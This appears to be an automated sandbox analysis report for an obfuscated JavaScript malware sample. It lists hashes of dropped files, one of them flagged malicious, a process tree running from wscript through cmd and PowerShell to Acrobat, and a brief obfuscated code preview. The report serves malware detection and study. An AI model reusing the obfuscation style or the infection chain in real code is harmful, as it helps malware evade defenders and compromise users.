SHA-512: | CA14E0003E879AEC40FFE796BD9316F986ABE716172787102DF34394E2FA0A84A32EC2E293E68B131DBEECF5A6996FF0629ACB48AD890D5E5A0EE8E0C02D7B9A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.312114822184675 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfbPtdPeUkwRe9:YvXKXB57eOrT5LjIP9eGDV8Ukee9 |
MD5: | 3A6FBDB482775FFC5659A905FB31E408 |
SHA1: | A05CDA941C3DEBF9AE134E7927E6BE53812A8940 |
SHA-256: | D961A2A201A4BD30FB9AE41EEF701314E0C547C7FC6F8E508C1B33DFF08E2F17 |
SHA-512: | 16DE5413FBE2DA58CB450F1726DAAB20EDC2F31409A2292A95929480E715CB2C97ACD4448D7BBD883AC94710530D2266A4D8BD97FCBDF7A3AC6E6052936CD7EA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.303937536659478 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJf21rPeUkwRe9:YvXKXB57eOrT5LjIP9eG+16Ukee9 |
MD5: | 23CDAED0BC6E0DAE36A84D9C813D346D |
SHA1: | D9E359E4D912558050923D0343E0CFFAD853C9B6 |
SHA-256: | E48CEDF62A6733D776DD524E28966BF4FE3FE2C3CEB2A86AF5EC3BB8D1E1F1D9 |
SHA-512: | 9AE3F5507A658DD821E9970E7A3842591E1EB9DC8AB5095C0D7D1C6E94960C37BED082B1C877A9A77C7E486A09144160C0F610CA9313B004F5A74C6DF2E15952 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.676470244701124 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB5amT5XIVLamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSIn:YvEceXWBgkDMUJUAh8cvMIn |
MD5: | CA041213AB7E12E6F79DD9117F7AD2F7 |
SHA1: | B1A593F450743303091DABCA21EAFCDF3F0C1C0E |
SHA-256: | 3CB50BDE7C9A3E5156DDF704683395DB30F87182C8780FE4B7EF8203CD34CE3E |
SHA-512: | 4A7BC65EF9EB1F201DA535D76982819E1BFBC5656D6D16ADD05C107E8632CE27C5DF2066D9C8348B03E5292909CB817349B811C9A7E7C9B2E916FC39B287D145 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.279144368369542 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJfshHHrPeUkwRe9:YvXKXB57eOrT5LjIP9eGUUUkee9 |
MD5: | FBD576435ED63521689801BF0AB8236F |
SHA1: | 3AD31648536E856EA6DA1C28F42B86C8793AEBBF |
SHA-256: | D2474F2B369A604672500775FA4E86F4101DA1B8744C4362DD44ADF5D6F26E9A |
SHA-512: | EB4A1602212587EDC6C098E94C260B4E00D3CBDE7837EC77498715CD420945AD381FEB50941BD7FA01DAB2519BFBC685D491670DAE482D5690079E0AB5A936E4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2780962159935 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBWqVteO4mSg1c2LjcWkHvR0YxhoAvJTqgFCrPeUkwRe9:YvXKXB57eOrT5LjIP9eGTq16Ukee9 |
MD5: | D499EBEB41A67D4B8972F1A27AB2D5E3 |
SHA1: | 384FBF5D28150E1EEC80AE33616F7C3DE8B9545F |
SHA-256: | 3565EBF16D600DC5F5739EC72E1DA1EDF4397C0CF14B9B692246C40FFD8FECC4 |
SHA-512: | 8933607ED74522F30EFF7703EAE4D6EF859D610C9EC9EC58222D26DE2B8CDA985BA44BCDBC91C9D0102CE2E77385DABD2ED9A9FF7DB6E763F5B4DF027AFBB1E7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.129563790860427 |
Encrypted: | false |
SSDEEP: | 48:YhDQaJ0DOOcX+asNguviNnKgFWMWJVp9h:WDQQ01cX+aFLkM2nh |
MD5: | 4B36B3F52A0C511E0F426D76134F2D38 |
SHA1: | 1E2570A3CA72FC7215EA041502B2FC5309379E8D |
SHA-256: | 0CC1D527381CB48A291B2F9E887AEB5576642162F1938D0A937606ECDFB1EC0A |
SHA-512: | 6E548AB8963D57CBCCA2CEA7717ADFE1BBC5F5C7C8EAFC62E7F67275715BE2829CACE7F6101FC57AD8B67F7CF53791FF72339F9C596FA7044BEF49CBB317F5B6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.3660861679765643 |
Encrypted: | false |
SSDEEP: | 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDu4CXKdqEKfS8EKfM1baACF:Tll2GL7msMcKTlS8fcsu4ZfIAC |
MD5: | D9E2844D3E3ED3F163890E70E2945593 |
SHA1: | D2CBBCCEF08945F24126391098B0351BAD102B6F |
SHA-256: | FF549DCF28830347ADF6B5ADA1E34A6E09C827DFD68C35FEC1D045C1F0D13B2A |
SHA-512: | BC47595E9B702BDC25B5688A5415D03339660D72B479DB0B3B55995D2608F396C00452D031DADDEAA79E66D382B5D533E9A2D10787E1471700EBB4B5C741DB2E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.8435825797995418 |
Encrypted: | false |
SSDEEP: | 24:7+tEZ6bqyKn6ylSTofcNqDu4C+KdqEKfS8EKfM1banbqdvqLKufx/XYKQvGJF7ux:7MScKTlS8fcsu4YfIsqGufl2GL7msq7 |
MD5: | 80A9715F93507282CFDF8E360053DD02 |
SHA1: | D97E7FCAB481294EC327E3A38238BB7BFB7855E0 |
SHA-256: | EDB4D2AB5E2F074001671C10A0ACD52612BFAA19A1D8D95A2BDE894BDA58C544 |
SHA-512: | 4CB810FC79EE813428484A8C29B880148CC1936AD8625C782D0FDA816CAAC2EFCF43CE98F618CCFBDB6EC4BC9A9BBF5073E12398121AF24C4FB428B7DBC8C4AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgQkolWrcVi/napI1lIr7Tw6n0O3WYyu:6a6TZ44ADEQk/cVkapI1GrvwgiK |
MD5: | FC95689E11EFA90C72558F2BA709446F |
SHA1: | B00636EBCD4B0BC0A19EC7ECD33C96B74B6485C3 |
SHA-256: | FE6F53EB4795EC57DED971DA6BF16E6C4888C3E64CAC2131F0A0C17A057DCDC9 |
SHA-512: | 762A10FC5A7A57EA03B39EF1A70E0F64D4384F7C9169D64CE294E34A49CC67C2137EA279B9E220F0E4789B4EB19AA8AC8F797CE7F4613A37F2CD3492854475F3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5085442896850614 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl81e:Qw946cPbiOxDlbYnuRKdM |
MD5: | CA9B782BE3BF2FC084BBEE4BA967258F |
SHA1: | 9D98A64EA7731BA06C99F452FF6D1CBD78FB6555 |
SHA-256: | 502303391D072D2D5FA17A6A84FEDBE16BD09318F6777A27E77EC76F9A0B7133 |
SHA-512: | 1BDFB67A1D01071CF4A0C5606A3617C74A9914804A6684C2590E76772E5EAA0D35537C90653983C149527BBB3210FFA0D2CBEDD0521F7A2FC849CB08AEB15D32 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 01-24-51-033.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.330589339471305 |
Encrypted: | false |
SSDEEP: | 384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink |
MD5: | 5BC0A308794F062FEC40F3016568DF9F |
SHA1: | 14149448191AB45E99011CBBEF39F2A9A03A0D15 |
SHA-256: | 00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473 |
SHA-512: | CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.359856380721926 |
Encrypted: | false |
SSDEEP: | 384:dz4bgWF/q94Zm8IB1a+4MfKrYvJRpLH5J2eqg8AEKtMthqxk3M0TvPata3yM0q/u:C+1iw |
MD5: | 9ACFEA104F5F8F8D4FA969FB74C5F751 |
SHA1: | 66B8B74034A22FFB108586ED2D820A8C270F689F |
SHA-256: | BE98121C1B59E8C6E9AF13744134A85EFB26E5850C90C212530A8596D9E47E0E |
SHA-512: | A12757D8AD6700EBB9ABFCEC51AF60D34C3E382752CB96ABF60FA5C5741CBABB333ABD6D7307A1D8C8F4FC6F81CE772193DC14A273A7B936C2CD8A4AF8819B82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.376824777835743 |
Encrypted: | false |
SSDEEP: | 192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmVcbMIwscb9:8qnXopZ50rUwn |
MD5: | D456146CC4A152104468E5C6E4885608 |
SHA1: | 5A8777C1C0A406BC085851F1EA87DBAD348294A5 |
SHA-256: | 2DB7D05925D2E97C6726B775A2BF62B86E15A0A37638034B8A64C28CF08A97F5 |
SHA-512: | D9B766CD0BD4562810273C52C060377678B88F653409F60E9C69373249967F26CDB9A834F3DDFE3145C12274FF36BDF17BBEC8E1159CAD545F685ACD9EFFBAB2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/pwYIGNPQ9WL07oXGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:xwZG29WLxXGZn3mlind9i4ufFXpAXkru |
MD5: | 17A4D09E4373155D739D65D37FDD108E |
SHA1: | 88ABEDA0447CCB031DD1D459657336A3FC50E486 |
SHA-256: | 36FC00DA4B14D66BF783B992AC62C7590237C315B55D28A07A1B2E8678F918E3 |
SHA-512: | B95D3AB00F85EE3C41F813755485CF6B5C7A57F3DE9ACEF2DD2B0BDB3644580D36B43E5F44F5D9120FAD2AE128E7D69EFF2A9C58690B7162C20C497A24C88498 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.897966654670795 |
TrID: | |
File name: | 131612862076531181.js |
File size: | 20'424 bytes |
MD5: | 5295ff9d329000363a56a37285f273c7 |
SHA1: | 3cc1b2e7871d364c0ebcb18142e44c26c5dd4801 |
SHA256: | cfa8e348c880d14c437ed27e69b73998ad4a8a6a8db0692814a7615779d0eb51 |
SHA512: | 9fe6a20823686d69f24cca04eb8b1c3509c037351b5f7a401f192ae3c15b85d6944cd7f47d1e4d61e0fe46b0e4a553d6cc185dc715f7c0052fee74ee19278d56 |
SSDEEP: | 192:stSVVbnvgG9CSVVvNgOKQOdJOa4mcedlT7Yj1CWI943BDKYRCabh9C/3zRKKPf//:1zn4GtBIt4HTh63zlX/T65wP |
TLSH: | 6E9263F1C41A8B2AE8E410D9509A04B1359C32CF91948613F1BDA936D76BFBA05D7CF9 |
File Content Preview: | function bfiurp(){qxofjvei=[1031,3079,5127,4103,2055,3072];var bbcepoql=this[prrlfej+tlxsq+gjkidxs+ddiama+tmaetmew+khtsb+dibodgyhx+yzmmk](this[dagehcb+ptejcsuf+xbrfsfvq+gjkidxs+tycjll+prrlfej+yzmmk][pdafir+gjkidxs+tmaetmew+tlxsq+yzmmk+tmaetmew+tmsuhwozr+n |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 01:24:41 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff796f40000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 01:24:41 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff71b4f0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 01:24:41 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 01:24:41 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 01:24:46 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6153b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 01:24:47 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff71b4f0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 01:24:47 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff747100000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 01:24:47 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 01:24:47 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff77afe0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 01:24:47 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61f300000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function bfiurp() { |
|
1 | qxofjvei = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
